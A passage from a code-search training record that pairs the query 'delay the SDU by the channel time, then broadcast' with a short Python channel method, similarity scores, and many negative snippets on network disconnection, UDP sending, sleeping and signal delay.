self._find_connection_element(var1, var2)\n if not conn:\n raise ModelModificationError(\"Cannot remove non-existent connection.\")\n if swap:\n var1, var2 = var2, var1\n # Find the relevant map_variables element\n mapv = conn.xml_xpath(u'cml:map_variables[@variable_1=\"%s\" and @variable_2=\"%s\"]'\n % (var1.name, var2.name))\n if not mapv:\n raise ModelModificationError(\"Cannot remove non-existent connection.\")\n conn.xml_remove_child(mapv[0])\n if not hasattr(conn, u'map_variables'):\n conn.xml_parent.xml_remove_child(conn)", "def Disconnect(self):\n if not self._auth_process or not self._dhcp_process:\n raise WiFiError('Must connect before disconnecting')\n\n self.ip = None\n dhcp_process, self._dhcp_process = self._dhcp_process, None\n auth_process, self._auth_process = self._auth_process, None\n next(dhcp_process)\n next(auth_process)\n\n # Remove temporary directory.\n if not self._user_tmp_dir:\n self._tmp_dir_handle.__exit__(None, None, None)\n self._tmp_dir = None", "def unconfigure_lldp_tlv_select(device, tlv):\r\n configs = [f'no lldp tlv-select {each_tlv}' for each_tlv in tlv] if isinstance(tlv, list) else [f'no lldp tlv-select {tlv}']\r\n try:\r\n device.configure(configs)\r\n except SubCommandFailure as e:\r\n raise SubCommandFailure(\r\n \"Could not unconfigure LLDP tlv-select\"\r\n \"Error: {error}\".format(error=e)\r\n )", "def detachDeviceAttr(*args, all: bool=True, attribute: AnyStr=\"\", axis: AnyStr=\"\", device:\n AnyStr=\"\", selection: bool=True, q=True, query=True, **kwargs)->Union[None,\n Any]:\n pass", "def remove_link(self,link,verbose=False):\n label, child = link\n self.outgoing.remove((label,child))\n child.incoming.remove((label,self))\n if verbose: print('removed', label, self.nodeid, child.nodeid)", "def disconnect(self, plug):\n if plug in self.connections:\n self.connections.pop(self.connections.index(plug))\n self.is_dirty = True\n if self in plug.connections:\n plug.connections.pop(plug.connections.index(self))\n plug.is_dirty = True", "def docker_network_disconnect(args, container_id, network): # type: (EnvironmentConfig, str, str) -> None\n docker_command(args, ['network', 'disconnect', network, container_id], capture=True)", "def castle_collection_detach(conn, coll):\n pycastle_log.debug(\"entering with conn = \"+str(conn)+\" coll = \"+str(coll))\n ret = libcastle.castle_collection_detach(conn, coll)\n if ret != 0:\n raise CastleCollectionDetachException(ret)\n pycastle_log.debug(\"Detached from coll number \"+str(coll))", "def detach_elastic_load_balancer(ElasticLoadBalancerName=None, LayerId=None):\n pass", "def detach_from_network(self, network):\n # type: ( Union[Network,BoundNetwork]) -> BoundAction\n return self._client.detach_from_network(self, network)", "def delete_overlay_network(self, name=NETWORK_NAME):\n try:\n # An overlay network is usually created in host belonging to a swarm\n self.leave_swarm()\n network = self.docker_client.networks.get(name)\n network.remove()\n except docker.errors.NotFound as nf:\n print(\"Network \"+name+\" not found\")\n except docker.errors.APIError as de:\n print(\"Error deleting overlay network\")\n print de\n exit(1)\n return", "def unplug_port_from_network(self, device_id, device_owner, hostname,\n port_id, network_id, tenant_id, sg, vnic_type,\n switch_bindings=None, segments=None):" ]
[ "0.5844689", "0.5619299", "0.55078894", "0.54105484", "0.5367822", "0.5262961", "0.52497536", "0.51190823", "0.51019", "0.5091018", "0.508095", "0.5041397", "0.5038449", "0.50244045", "0.5019844", "0.49974367", "0.4993187", "0.49843723", "0.4972273", "0.49417922", "0.49223176", "0.49213302", "0.48968047", "0.4891377", "0.4872835", "0.48695236", "0.48598656", "0.48377714", "0.4829794", "0.481843", "0.481407", "0.48094866", "0.47910187", "0.47906727", "0.47902814", "0.47814527", "0.4777663", "0.4775837", "0.47716093", "0.4763799", "0.4756678", "0.4753771", "0.4746669", "0.47437447", "0.47417003", "0.4733524", "0.47323278", "0.47298884", "0.4726929", "0.4723887", "0.47238508", "0.4711896", "0.470907", "0.47026837", "0.4694029", "0.4690409", "0.4689618", "0.4681312", "0.46711877", "0.4668667", "0.4665937", "0.46598217", "0.465732", "0.46556476", "0.4648402", "0.46345684", "0.46329218", "0.46296674", "0.46241677", "0.4617678", "0.4617391", "0.4614852", "0.46030444", "0.45964006", "0.4592549", "0.45907286", "0.45875496", "0.45829165", "0.45618254", "0.45574647", "0.4552248", "0.45516226", "0.45474654", "0.4546037", "0.45390937", "0.45305657", "0.45297047", "0.45268255", "0.4525862", "0.4520766", "0.45206627", "0.45198286", "0.451763", "0.45122856", "0.45022643", "0.44995463", "0.44970995", "0.4491858", "0.44905382", "0.44900677" ]
0.84005505
0
delay the SDU by the channel time, then broadcast to all attached phys (including the sender)
def _receive_request(self, sdu): if self._busy: raise RuntimeError("Channel busy") self._busy = True self._propagate(sdu)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def udelay(us: int, /) -> None:", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr_declare_sample_delay(self, *args)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr_declare_sample_delay(self, *args)", "def broadcast(self, session, params):\n session.set_status('running')\n FMT = self.udp_schema['format']\n FMT_LEN = struct.calcsize(FMT)\n UDP_PORT = self.udp['port']\n udp_data = []\n fields = self.udp_schema['fields']\n session.data = {}\n\n # BroadcastStreamControl instance.\n stream = self.acu_control.streams['main']\n\n class MonitorUDP(protocol.DatagramProtocol):\n def datagramReceived(self, data, src_addr):\n host, port = src_addr\n offset = 0\n while len(data) - offset >= FMT_LEN:\n d = struct.unpack(FMT, data[offset:offset + FMT_LEN])\n udp_data.append(d)\n offset += FMT_LEN\n\n handler = reactor.listenUDP(int(UDP_PORT), MonitorUDP())\n influx_data = {}\n influx_data['Time_bcast_influx'] = []\n for i in range(2, len(fields)):\n influx_data[fields[i].replace(' ', '_') + '_bcast_influx'] = []\n\n active = True\n last_packet_time = time.time()\n\n while session.status in ['running']:\n now = time.time()\n if len(udp_data) >= 200:\n if not active:\n self.log.info('UDP packets are being received.')\n active = True\n last_packet_time = now\n\n process_data = udp_data[:200]\n udp_data = udp_data[200:]\n for d in process_data:\n data_ctime = sh.timecode(d[0] + d[1] / sh.DAY)\n self.data['broadcast']['Time'] = data_ctime\n influx_data['Time_bcast_influx'].append(data_ctime)\n for i in range(2, len(d)):\n self.data['broadcast'][fields[i].replace(' ', '_')] = d[i]\n influx_data[fields[i].replace(' ', '_') + '_bcast_influx'].append(d[i])\n acu_udp_stream = {'timestamp': self.data['broadcast']['Time'],\n 'block_name': 'ACU_broadcast',\n 'data': self.data['broadcast']\n }\n self.agent.publish_to_feed('acu_udp_stream',\n acu_udp_stream, from_reactor=True)\n influx_means = {}\n for key in influx_data.keys():\n influx_means[key] = np.mean(influx_data[key])\n influx_data[key] = []\n acu_broadcast_influx = {'timestamp': influx_means['Time_bcast_influx'],\n 'block_name': 'ACU_bcast_influx',\n 'data': influx_means,\n }\n self.agent.publish_to_feed('acu_broadcast_influx', acu_broadcast_influx, from_reactor=True)\n sd = {}\n for ky in influx_means:\n sd[ky.split('_bcast_influx')[0]] = influx_means[ky]\n session.data.update(sd)\n else:\n # Consider logging an outage, attempting reconfig.\n if active and now - last_packet_time > 3:\n self.log.info('No UDP packets are being received.')\n active = False\n next_reconfig = time.time()\n if not active and params['auto_enable'] and next_reconfig <= time.time():\n self.log.info('Requesting UDP stream enable.')\n try:\n cfg, raw = yield stream.safe_enable()\n except Exception as err:\n self.log.info('Exception while trying to enable stream: {err}', err=err)\n next_reconfig += 60\n yield dsleep(1)\n\n yield dsleep(0.005)\n\n handler.stopListening()\n return True, 'Acquisition exited cleanly.'", "def delay_writing_for(self, ms, soc):\n self._log(\"waiting %sms before responding...\" % ms)\n\n def resume_writing():\n self._write_list.append(soc)\n\n self._write_list.remove(soc)\n self._timer_list.append((_nowms() + ms, resume_writing))", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr_sample_delay(self, which)", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr_sample_delay(self, which)", "def _delay(self, n=None):", "def sample_delay(self, *args, **kwargs):\n return _uhd_swig.usrp_sink_sptr_sample_delay(self, *args, **kwargs)", "async def sleep(cls, delay: float) -> None:", "def send_signal():\n print(\"... run {0} transmission\".format(SendSignal.__SIGNAL_SETTINGS['repeats']))\n SendSignal.__SIGNAL_OBJ.RFxmit(SendSignal.__SIGNAL_SETTINGS['text_message'] *\n SendSignal.__SIGNAL_SETTINGS['repeats'])\n print('... set USB Dongle idle')\n SendSignal.__SIGNAL_OBJ.setModeIDLE()", "def __stream_triggered(self):\n # Call this every time period\n thread = Timer(self.stream_time, self.__stream_triggered)\n thread.start()\n self.__threads.append(thread)\n\n if len(self.__spike_buffer) > 2:\n speed = self.__get_speed()\n print(speed)\n self.__stream_send(speed)", "def send_sus_list(key):\n while True:\n if not receive_sus():\n signature = key.create_signature(json.dumps(SUS) + '2')\n\n pack_send = Ether(dst='98:98:98:22:22:22') / \\\n IP(dst='172.16.104.16') / \\\n UDP(dport=2223, sport=2223) / \\\n DB(len_sign=len(signature), cmd=2,\n send_num=5, param=signature + json.dumps(SUS).encode())\n\n conf.iface = 'eth0'\n sendp(pack_send)", "def _schedule_send_in_order(self, rudp_packet, timeout):\n final_packet = self._finalize_packet(rudp_packet)\n seqnum = rudp_packet.sequence_number\n timeout_cb = REACTOR.callLater(0, self._do_send_packet, seqnum)\n self._sending_window[seqnum] = self.ScheduledPacket(\n final_packet,\n timeout,\n timeout_cb,\n 0\n )", "def __delay(msecs):\n time.sleep(msecs / 1000)", "def delay_requests(self, seconds: float):\n delta_since_last_send = time.time() - self._last_send\n self._last_send = (time.time() - delta_since_last_send) + seconds", "def send_blocking_signal(self, compression=True):\n while not self._stop_receive.is_set():\n if len(self._send_queue) > 0:\n super(MastermindClientUDP, self).send(JSONSerializer.serialize(self._send_queue.pop()), compression)\n else:\n super(MastermindClientUDP, self).send(JSONSerializer.serialize(DummyEvent()), compression)\n time.sleep(1)", "def _do_send_packet(self, seqnum):\n sch_packet = self._sending_window[seqnum]\n if sch_packet.retries >= constants.MAX_RETRANSMISSIONS:\n self.shutdown()\n else:\n self._proto.send_datagram(sch_packet.rudp_packet, self.relay_addr)\n sch_packet.timeout_cb = REACTOR.callLater(\n sch_packet.timeout,\n self._do_send_packet,\n seqnum\n )\n sch_packet.retries += 1\n self._cancel_ack_timeout()", "def client_send(state):\n while state.running:\n disconnected_users = []\n time.sleep(0.05)\n for nick in users:\n nick, queue = nick, users[nick].queue\n while len(queue) > 0:\n sender, msg = queue.pop(0)\n message = '{}> {}'.format(sender, msg)\n print(message)\n try:\n for _usr in channels['SYSAR']:\n # if _usr != sender:\n print('should send')\n send_buf(users[_usr].socket, message)\n except:\n if nick not in disconnected_users:\n disconnected_users.append(nick)\n for nick in disconnected_users:\n print('ALERT::{} disconnected'.format(nick))\n del users[nick]", "def send_state():\n while True:\n if I_AM_CRUSHED is False:\n sleep_time = random.randint(send_state_sec[0], send_state_sec[1])\n sock_check = socket.socket(type=socket.SOCK_DGRAM)\n sock_check.sendto(\"I'am healthy\", ('dispatcher', port_for_check))\n sock_check.close()\n time.sleep(sleep_time)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_pdu_packer_sptr_declare_sample_delay(self, *args)", "def broadcast(self, txt):\n\n for i in self.state['joinedchannels']:\n self.say(i, txt, speed=-1)", "def sendto(self, msg, addr, family):\n sock = socket.socket(family, socket.SOCK_DGRAM)\n sock.sendto(msg, addr)\n time.sleep(0.1)", "def sleep(self,length=10):\n self.rs485.write_command('#{}bs {}'.format(self.address,length))", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.udp_debug_sptr_declare_sample_delay(self, *args)", "def on_send_sd(self, e):\n # get channel selected\n selected_index = self.channel_list.GetSelection()\n # ask user for seconds duration\n dlg = wx.TextEntryDialog(\n self, 'How long do you want that message to last?', 'Message duration in seconds')\n # if the user presses OK,\n if dlg.ShowModal() == wx.ID_OK:\n # get the duration\n duration = int(dlg.GetValue())\n # if a channel is selected,\n if selected_index != -1:\n # send the message and clear the input buffer\n self.send_wrap({\n \"action\": \"user_message\",\n \"duration\": duration,\n \"channel\": self.channel_list.GetString(selected_index),\n \"flags\": [\"sd\"],\n \"timestamp\": int(datetime.datetime.utcnow().timestamp()),\n \"message\": self.user_input.GetValue()\n })\n self.user_input.SetValue(\"\")\n else:\n dialog = wx.MessageDialog(\n self, \"No channel is selected.\", \"Warning\", wx.ICON_WARNING)\n dialog.ShowModal()\n dialog.Destroy()", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr_declare_sample_delay(self, *args)", "def sample_delay(self, *args, **kwargs):\n return _TestA_swig.my_qpsk_demod_cb_sptr_sample_delay(self, *args, **kwargs)", "def Sleep(self):\n sleep(self.pSampling)", "def _schedule_send_out_of_order(self, rudp_packet):\n final_packet = self._finalize_packet(rudp_packet)\n self._proto.send_datagram(final_packet, self.relay_addr)", "def begin_sending_packets():\n monitoru = main_monitoring.MainMonitoring()\n monitoru.start_monitor_loop()", "def delay(ms: int, /) -> None:", "def syncloss(self):\n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def dmx_send_frame(self):\n if self.flag_connected:\n try:\n temp_array = array.array('B')\n for channel_index in range(0, self.channel_count):\n temp_array.append(self.channels[channel_index])\n\n # print(\"temp_array:{}\".format(temp_array))\n # print(\"send frame..\")\n self.wrapper.Client().SendDmx(\n self.universe,\n # self.channels,\n temp_array,\n self.dmx_send_callback\n )\n # print(\"done.\")\n except OLADNotRunningException:\n self.wrapper.Stop()\n print(\"olad not running anymore.\")\n else:\n # throw error\n pass", "def send(self):\n send_pos = 0 \n\n # send list not empty\n if(len(self.send_list) == 0): \n if(len(self.send_wait) == 0):\n return False\n self.send_list.append(self.send_wait[0]) # add send list\n self.send_pos_frame.append(0)\n self.send_wait.pop(0) # refresh send_wait\n\n send_now = self.send_list[send_pos]\n host = send_now[0] # port send frame\n frame = send_now[1] \n\n bit = frame.get_bit(self.send_pos_frame[send_pos])\n\n q = Queue()\n\n q.put((host,'s'))\n \n # 's': send, 'r': receive\n while not q.empty():\n front = q.get()\n name_port = front[0]\n tp = front[1] # type operation: 'r' o 's'\n\n name = Tools.get_device_name(name_port)\n port = Tools.get_device_port_index(name_port)\n\n dev = self.get_device(name)\n \n if(tp == 's'):\n new_dev = dev.send(bit, port)\n else: # tp == 'r'\n new_dev = dev.receive(bit, port)\n \n for i in new_dev:\n q.put(i)\n\n # signal time\n self.signal_count += 1\n if(self.signal_count == self.signal_time):\n self.send_pos_frame[send_pos] += 1\n if(self.send_pos_frame[send_pos] == frame.length()): # if frame send complete\n #reset send list\n self.send_list.pop(send_pos)\n self.send_pos_frame.pop(send_pos)\n\n self.signal_count = 0\n\n return True", "def send_command(s, IP, PORT, sec, cmd, seq, bits):\n # print(IP, PORT)\n # print(s)\n # s.connect((IP, PORT))\n if sec > 1:\n sleep_time = .03\n else:\n sleep_time = sec / 10\n start = time.time()\n while time.time() < (start + sec):\n print(\"sending\")\n s.sendto(cmd.format(seq, bits).encode('utf-8'), (IP, PORT))\n time.sleep(sleep_time)\n seq += 1\n # s.close()\n return seq", "async def loop():\n # ArmDevice.storage.joints_pos = await get_positions() # Use this if encoders are wired up.\n # ArmDevice.storage.joints_pos = simulate_positions() # Use this for testing without position feedback.\n log.debug(\"command: {}\".format(ArmDevice.storage.command))\n ArmDevice.storage.controller.user_command(ArmDevice.storage.mode, *ArmDevice.storage.command)\n ArmDevice.storage.speeds = ArmDevice.storage.controller.update_duties(ArmDevice.storage.joints_pos)\n\n # publish speeds/duty cycles here\n log.debug(\"joints_pos: {}\".format(ArmDevice.storage.joints_pos))\n log.debug(\"speeds: {}\".format(ArmDevice.storage.speeds))\n await send_duties()", "def delay(self, seconds):\n\n if self.call is None:\n return\n self.call.delay(seconds)", "def RecvAndSleep(s):\n s.recv(RECV_BYTES)\n time.sleep(SLEEP_SEC)", "def send_events(sock):\n i=0\n while i<10:\n log.info('Sending message from publisher..')\n sock.send(\"even - hai i am publisher\")\n time.sleep(0.2)\n i += 1", "def send_data_control_experiment(ecg, emg, gsr):\n\ti = 0\n\tj = 0\n\tk = 0\n\twhile True:\n\t\tif i == len(ecg): break\n\t\tskt.send(bytes(ecg[i], 'utf-8'))\n\t\ti += 1\n\t\t# blocking - always wait for ACK before sending the next packet\n\t\t# - can change this and handle out of order packets\n\t\t# ACK = soc.recv(1024)\n\n\t\t# wait for 1 sec before sending next packet\n\t\t# simulate a real time situation\n\t\t# time.sleep(1)\n\n\twhile True:\n\t\tif j == len(emg): break\n\t\tskt.send(bytes(emg[j], 'utf-8'))\n\t\tj += 1\n\n\twhile True:\n\t\tif k == len(gsr): break\n\t\tskt.send(bytes(gsr[k], 'utf-8'))\n\t\tk += 1\n\n\tstart = time.time()\n\tskt.sendall(b'A'*1024)\n\tend = time.time()\n\tprint(end - start)", "def _send(x, dst=0):\n x = torch.tensor(x)\n x = to_device(x)\n dist.send(x, dst)\n del x \n torch.cuda.empty_cache()", "def Delay( X, delay_time, feedback_amt, wetdry, apply_fb_input=True, rate=SR ):\n\n # convert inputs if scalars into np arrays\n delay_time = delay_time * np.ones(len(X)) if np.isscalar(delay_time) else delay_time\n feedback_amt = feedback_amt * np.ones(len(X)) if np.isscalar(feedback_amt) else feedback_amt\n wetdry = wetdry * np.ones(len(X)) if np.isscalar(wetdry) else wetdry\n\n # convert delay time to delay in samples\n # not implemented yet, but eventually would be good to interpolate\n maxdelay = np.max(delay_time)\n # delay_samps = np.array(delay_time*SR).astype(int)\n delay_samps = delay_time * SR\n\n # create circular buffer with appropriate size\n buffer_size = int( math.ceil( math.log(maxdelay*rate,2) ) )\n # print(buffer_size)\n delay_size = int(round(maxdelay*SR)) # approximate for now\n delaybuff = Circ_buffer( buffer_size=buffer_size, delay_size=delay_size )\n\n # make output vec\n output_sig = np.zeros(len(X)).astype(int)\n\n # process signal\n for ii in range(len(X)):\n\n # read delayed value\n delay_prev_samp = math.ceil( delay_samps[ii] )\n prev_samp = delaybuff.read_value( delay_prev_samp )\n delay_next_samp = delay_prev_samp - 1\n next_samp = delaybuff.read_value(delay_next_samp)\n output_sig[ii] = prev_samp + ( (next_samp - prev_samp) * (delay_prev_samp - delay_samps[ii]) )\n\n # calculate value to write\n if apply_fb_input:\n cur_value = (X[ii] + output_sig[ii]) * feedback_amt[ii]\n else:\n cur_value = X[ii] + output_sig[ii]*feedback_amt[ii]\n\n # write to buffer\n delaybuff.write_value(int(cur_value))\n\n # end for loop\n\n # return output\n return np.array(output_sig * wetdry + X * (1-wetdry)).astype(np.int16)", "def send_command(client, device_label, device_command, device_hold_secs=0):\n device_id = devices[device_label]['id']\n func = client.send_command(device_id, device_command, device_hold_secs)\n run_in_loop_now('send_command', func)\n print(\"Sent: \" + device_command + \" to \" + device_label)\n return", "def send_msg():\n\tmessage = \"%s %s %d\\n\" % (metric, activeDAHDIChannels, int(time.time()))\n\t# print 'sending message:\\n%s' % message\n\tcarbonSocket = socket.socket()\n\tcarbonSocket.connect((CARBON_HOST, CARBON_PORT))\n\tcarbonSocket.sendall(message)\n\tcarbonSocket.close()\n\tlast_send = int(time.time())", "def Delay_distortion( X, delay_time, feedback_amt, wetdry, distortion_amt, rate=SR ):\n\n # convert inputs if scalars into np arrays\n delay_time = delay_time * np.ones(len(X)) if np.isscalar(delay_time) else delay_time\n feedback_amt = feedback_amt * np.ones(len(X)) if np.isscalar(feedback_amt) else feedback_amt\n wetdry = wetdry * np.ones(len(X)) if np.isscalar(wetdry) else wetdry\n\n # convert delay time to delay in samples\n maxdelay = np.max(delay_time)\n delay_samps = np.array(delay_time*SR).astype(int)\n\n # create circular buffer with appropriate size\n buffer_size = int( math.ceil( math.log(maxdelay*rate,2) ) )\n # print(buffer_size)\n delay_size = int(round(maxdelay*SR)) # approximate for now\n delaybuff = Circ_buffer( buffer_size=buffer_size, delay_size=delay_size )\n\n # make output vec\n output_sig = np.zeros(len(X)).astype(int)\n\n # process signal\n for ii in range(len(X)):\n\n # set delay time\n delaybuff.set_delay( delay_samps[ii] )\n\n # read delayed value\n output_sig[ii] = delaybuff.read_value()\n\n # calculate value to write\n cur_value = X[ii] + output_sig[ii]*feedback_amt[ii]\n\n # add distortion\n cur_value = Distortion(cur_value, 'SIG', distortion_amt)\n\n # write to buffer\n delaybuff.write_value(int(cur_value))\n\n # end for loop\n\n # return output\n return np.array(output_sig * wetdry + X * (1-wetdry)).astype(np.int16)", "def sample_delay(self, which):\n return _spacegrant_swig.udp_debug_sptr_sample_delay(self, which)", "def __send_cmd(cmds, duration):\r\n # reset\r\n print(\"sleep\")\r\n time.sleep(duration)\r\n for cmd, wheel in zip(cmds, wheels):\r\n wheel.write(__reset())\r\n print(\"reset\")\r\n # this is a reset sleep, a const\r\n time.sleep(0.2)\r\n # write command\r\n for cmd, wheel in zip(cmds, wheels):\r\n print(\"write commands: \" + str(cmd))\r\n wheel.write(cmd)", "def _send(self) -> None:\n if not self.connected or now() < self.next_send:\n return\n self.next_send += self.poll_interval\n buff = []\n while self.outq:\n msg_id, tag, data = self.outq.popleft()\n buff.append(pickle.dumps((msg_id, tag, data)))\n if buff:\n stream = b\"\".join(buff)\n self.endpoint.sendall(stream)", "def __send(self, cmd, delay=.1):\n\n self.__write(cmd)\n\n if delay is not None:\n print(\"wait: %d seconds\" % delay)\n time.sleep(delay)\n\n return self.__read()", "def wake_up(self):\r\n self._write.send('1')", "def declare_sample_delay(self, *args):\n return _uhd_swig.usrp_sink_sptr_declare_sample_delay(self, *args)", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_pdu_packer_sptr_sample_delay(self, which)", "def send_and_flush(self, msg):\r\n try:\r\n self.bus.send(msg)\r\n msg.data[:4] = bytearray(4)\r\n # print(\"Message sent on {}\".format(self.bus.channel_info))\r\n except can.CanError:\r\n print(\"Message NOT sent\")", "def send_mute(self, dev, action=None):\n if action not in ['true', 'false', None]:\n action = None\n\n with self.smqtt as client:\n client.publish(\n IOTLinkTopics.MUTE.format(\n domain=dev['domain'],\n device_name=dev['name']\n ),\n payload=action\n )", "def broadcast(self, msg_type, msg, t=5):\n return None", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.binary_sink_sptr_declare_sample_delay(self, *args)", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr_sample_delay(self, which)", "def _attempt_enabling_looping_send(self):\n if (\n not self._looping_send.running and\n self._state == State.CONNECTED and\n len(self._sending_window) < constants.WINDOW_SIZE and\n len(self._segment_queue)\n ):\n self._looping_send.start(0, now=True)", "def sample_delay(self, *args, **kwargs):\n return _uhd_swig.usrp_source_sptr_sample_delay(self, *args, **kwargs)", "def sweep_timing(dir_out,box,channel,width,delay,scope,min_volt=None):\n print '____________________________'\n print width\n\n #fixed options\n height = 16383 \n fibre_delay = 0\n trigger_delay = 0\n pulse_number = 11100 \n #first select the correct channel and provide settings\n logical_channel = (box-1)*8 + channel\n \n sc.select_channel(logical_channel)\n sc.set_pulse_width(width)\n sc.set_pulse_height(16383)\n sc.set_pulse_number(pulse_number)\n sc.set_pulse_delay(delay)\n sc.set_fibre_delay(fibre_delay)\n sc.set_trigger_delay(trigger_delay)\n \n # first, run a single acquisition with a forced trigger, effectively to clear the waveform\n scope._connection.send(\"trigger:state ready\")\n time.sleep(0.1)\n scope._connection.send(\"trigger force\")\n time.sleep(0.1)\n\n # Get pin read\n time.sleep(0.1)\n sc.fire_sequence() # previously fire_sequence!\n #wait for the sequence to end\n tsleep = pulse_number * (delay*1e-3 + 210e-6)\n time.sleep(tsleep) #add the offset in\n sc.stop()\n\n # File system stuff\n check_dir(\"%s/raw_data/\" % (dir_out))\n directory = check_dir(\"%s/raw_data/Channel_%02d/\" % (dir_out,logical_channel))\n channels = [1,4]\n fnames = []\n fnames.append(\"%sPMTPulseWidth%05d\" % (directory,width))\n fnames.append(\"%sTriggerPulseWidth%05d\" % (directory,width))\n \n # Check scope\n ck = find_and_set_scope_y_scale(1,height,width,delay,scope,scaleGuess=min_volt)\n scope.set_edge_trigger(1.4, 4 , falling=False) # Rising edge trigger \n if ck == True:\n print \"Saving raw files to: %s and %s\" % (fnames[0],fnames[1])\n sc.fire_continuous()\n time.sleep(0.2)\n save_ck = save_scopeTraces_Multiple(fnames, scope, channels, 100)\n sc.stop()\n time.sleep(5)\n if save_ck == True:\n # Calc and return params\n xPMT,yPMT = calc.readPickleChannel(fnames[0], 1)\n xTrigger,yTrigger = calc.readPickleChannel(fnames[1], 1)\n meanJitter, JitterDev, JitterErrorOnMean = calc.calcJitter(xTrigger,yTrigger,xPMT,yPMT)\n return meanJitter, JitterErrorOnMean", "def sleep(cls, timeout):\n sleep_channel = Channel()\n try:\n sleep_channel.receive(timeout)\n except TimeoutError:\n pass #expected to happen after timeout", "def run(self):\r\n waiting_packet = None\r\n while True:\r\n if waiting_packet is not None:\r\n packet = waiting_packet\r\n waiting_packet = None\r\n else:\r\n packet = yield self.buffer.get()\r\n self.channel.add_sender(self)\r\n yield self.env.timeout(packet.size/self.service_rate)\r\n self.channel.remove_sender(self)\r\n packet.output_timestamp= env.now\r\n if self.destination is None:\r\n self.packet_list.append(packet)\r\n if (not self.collision):\r\n if self.destination is not None:\r\n self.destination.put(packet)\r\n self.channel.packet_list.append(packet)\r\n else:\r\n if self.debug:\r\n print(\"Packet %d is discarded. Reason: Collision\" \r\n % (packet.id))\r\n self.packets_drop += 1\r\n waiting_packet = packet\r\n self.collision = False\r\n yield self.env.timeout(self.random_delay())", "def update(self, dt):\n # handle spawing events from the bursts\n for burst in self.bursts.keys():\n b = self.bursts[burst] \n trigger = b.update(dt) \n if trigger: \n pool, gain, position = trigger \n name = self.unique_name()\n self.spawn_pool(pool, name)\n snd = self.sounds[name]\n snd.gain.set_with_time(gain, 0.0)\n snd.position.set_with_time(np.array(position), 0.0) \n self._start_sound(snd,[])\n \n kill_list = [] \n # and then each of layers (e.g. to make sure fades take effect)\n for sound in self.sounds.keys():\n snd = self.sounds[sound]\n if snd is None or snd.finished:\n kill_list.append(sound)\n else:\n snd.update(dt)\n \n # each of the channel groups (must do this after sounds for override to work)\n \n for ch_group in self.channel_groups.keys():\n self.channel_groups[ch_group].update(dt) \n \n for sound in kill_list:\n if self.sounds[sound] is not None and self.sounds[sound].transient:\n logging.debug(\"Removing finished sound %s\" % sound) \n del self.sounds[sound]\n # update FMOD \n system.update()", "def delay(seconds):\n\n # Perform the delay\n time.sleep(seconds)", "def RandomDelay():\r\n sleep(random())", "def _sleep(self):\n while 1:\n diff = (time.time()-self.lastcall) - self.mindelay\n if diff >= 0: return\n time.sleep(max(-diff/2.0, 0.01))", "def start_wireless_sensing(self):\n\n gps_pos = self.dc.read_gps()\n n_samples = 256 # DON'T CHANGE TO 128!!!!! IT CAUSES KERNEL PANIC (unless you change tick or find another fix)\n if IS_SIMULATION:\n dBm = self.get_simulated_dBm()\n # dBm = random.uniform(-1, -10)\n self.dBm = dBm\n self.ContSamples += 1\n time.sleep(0.01)\n else:\n self.ContSamples += 1\n samples = self.sdr.read_samples(n_samples)\n dBm = 10 * np.log10(np.mean(np.power(np.abs(samples), 2)))\n self.dBm = dBm\n\n if self.ContSamples > self.SamplesToDiscard:\n\n wireless_msg0 = HotspotWirelessMessage(\n location=gps_pos,\n sdr=[],\n dBm=dBm,\n )\n self.flight_logger.log(wireless_msg0)\n\n now = time.time()\n # if ((dBm > THRESHOLD_dBm) and (now - self.lastInsert) >= THRESHOLD_Sampling):\n\n if (now - self.lastInsert) >= THRESHOLD_Sampling:\n if self.FLAG == 2:\n wireless_msg = HotspotWirelessMessage(\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n self.wireless_logger.log(wireless_msg)\n\n if self.FLAG == 1:\n wireless_msg2 = HotspotFilterMessage(\n hotcaltime=self.hottime,\n alepcaltime=self.aleptime,\n survetime=self.surveytime,\n swarmtime=self.swarmtime,\n FLAG=self.FLAG,\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n\n self.wireless_filter.log(wireless_msg2)\n\n self.wireless_data.append(wireless_msg0)\n\n self.lastInsert = time.time()\n # if len(self.wireless_data) >= SAMPLES_SWARM * self.sentData:\n if len(self.wireless_data) >= SAMPLES_SL:\n # self.sentData +=1\n self.ready_to_send = True", "def test_send():\n\n print \"Sending Note Ons....\"\n f = open(PIMIDI_DEV, \"wb\")\n for note_no in xrange(0x3c, 0x48, 2):\n for j in (chr(0x90), chr(note_no), chr(0x60)):\n f.write(j)\n sleep(1)\n f.close()", "def scheduleIn(self,delay,cb,uniqueTag=None,priority=0,exceptCurrentASN=True):\n\n with self.dataLock:\n asn = int(self.asn+(float(delay)/float(self.settings.slotDuration)))\n\n self.scheduleAtAsn(asn,cb,uniqueTag,priority,exceptCurrentASN)", "def handle_congestion(self):\n print(\"\\nNetwork is congested! Sending rate is decreased.\\n\")\n self.delay *= 1.2\n time.sleep(1)", "def sleep(self):\n self._epd.sleep()", "def declare_sample_delay(self, *args):\n return _TestA_swig.my_qpsk_demod_cb_sptr_declare_sample_delay(self, *args)", "def delay(fs, x, dt, keep_length=True, axis=-1):\n dn = int(round(dt * fs))\n x = np.asarray(x)\n n = x.shape[axis]\n\n if dn > 0:\n # delay\n zeros_shape = list(x.shape)\n zeros_shape[axis] = dn\n zeros = np.zeros(zeros_shape)\n\n delayed = np.concatenate((zeros, x), axis=axis)\n\n if keep_length:\n # slice that takes 0 to ntaps samples along axis\n slc = [slice(None)] * len(x.shape)\n slc[axis] = slice(0, n)\n delayed = 